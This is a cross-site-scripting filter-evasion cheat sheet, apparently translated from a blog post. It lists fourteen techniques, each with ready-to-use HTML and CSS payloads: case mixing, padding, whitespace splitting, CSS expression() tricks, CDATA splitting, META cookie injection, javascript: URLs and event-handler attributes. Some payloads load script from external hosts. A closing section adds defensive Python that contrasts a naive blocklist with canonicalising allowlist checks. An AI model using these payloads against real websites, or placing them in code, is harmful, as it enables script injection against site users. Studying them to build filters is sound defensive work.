1. Vary the case of characters

<sCript>alert('d')</scRipT>

2. Pad with extra characters to evade the regular expression check

<<script>alert('c')//<</script>
<SCRIPT a=">" SRC="t.js"></SCRIPT>
<SCRIPT =">" SRC="t.js"></SCRIPT>
<SCRIPT a=">" '' SRC="t.js"></SCRIPT>
<SCRIPT "a='>'" SRC="t.js"></SCRIPT>
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use a different extension in place of .js

<script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
background-image: url('javascript:alert("XSS");')
}

5. Insert extra characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>
<SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a new line to evade

<img src="jav ascr ipt:alert('XSS3')">
<img src="jav ascr ipt:alert('XSS3')">
<IMG SRC="jav ascript:alert('XSS');">

-> tab
-> new line
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>
<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">
<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. script in HTML tag

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. A swf containing XSS code

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and reassemble it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>

13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>
<img src="javascript:alert('XSS3')">
<IMG DYNSRC="javascript:alert('XSS20')">
<IMG LOWSRC="javascript:alert('XSS21')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">
<IFRAME SRC=javascript:alert('XSS27')></IFRAME>
<TABLE BACKGROUND="javascript:alert('XSS29')">
<DIV STYLE="background-image: url(javascript:alert('XSS30'))">
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
</STYLE><A CLASS=XSS></A>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
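The case, padding, whitespace and encoding tricks in items 1, 2, 5, 6, 8 and 14 all defeat a filter that searches for fixed substrings. As an added example (not from the original post), the Python below puts such a naive blocklist beside a canonicalise-then-allowlist check run over payloads from the list above; the allowed tag and scheme sets and the hex-encoded sample are constructed for this example.

```python
import html
import re

# The kind of check the tricks above are written against: a case-sensitive
# search for fixed substrings.
NAIVE_BLOCKLIST = re.compile(r"<script|javascript:")

# Allowlists constructed for this example; a real application tunes them.
ALLOWED_SCHEMES = {"http", "https", "mailto"}
ALLOWED_TAGS = {"b", "i", "p", "br"}

# A tag name follows "<" or "</"; whatever comes next (space, "/", an
# attribute) is ignored, so <SCRIPT/SRC=...> and <sCript> both give "script".
_TAG_NAME = re.compile(r"<\s*/?([a-z][a-z0-9]*)", re.I)
_SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):")

def naive_blocklist(value: str) -> bool:
    """True if the naive filter would reject the value."""
    return bool(NAIVE_BLOCKLIST.search(value))

def canonical_scheme(value: str):
    """Return the lowercase URL scheme a browser would act on, or None."""
    s = html.unescape(value)                            # &#x6A;avascript: -> javascript:
    s = re.sub(r"^[\x00-\x20]+|[\x00-\x20]+$", "", s)   # leading/trailing controls
    s = re.sub(r"[\t\n\r]", "", s)                      # browsers drop these inside a URL
    m = _SCHEME.match(s.lower())
    return m.group(1) if m else None

def url_is_safe(value: str) -> bool:
    """Allowlist: scheme-less (relative) URLs and allowed schemes pass."""
    scheme = canonical_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES

def tag_names(value: str) -> set:
    """Lowercased tag names in a fragment, after entity decoding."""
    return {m.group(1).lower() for m in _TAG_NAME.finditer(html.unescape(value))}

def markup_is_safe(value: str) -> bool:
    """Allowlist: every tag name present must be in ALLOWED_TAGS."""
    return tag_names(value) <= ALLOWED_TAGS

if __name__ == "__main__":
    # Payloads from the list above plus a constructed hex-encoded scheme;
    # the naive filter misses every one of them.
    for p in ["<sCript>alert('d')</scRipT>", '<SCRIPT/SRC="t.js"></SCRIPT>',
              "jav\tascr\nipt:alert('XSS3')", "&#x6A;avascript:alert(1)"]:
        blocked = not (markup_is_safe(p) and url_is_safe(p))
        print(repr(p), "naive:", naive_blocklist(p), "allowlist:", blocked)
```

The scheme check only vets the scheme: the stylesheet URL in item 4 passes it, so externally loaded resources still need a host allowlist or a Content-Security-Policy on top.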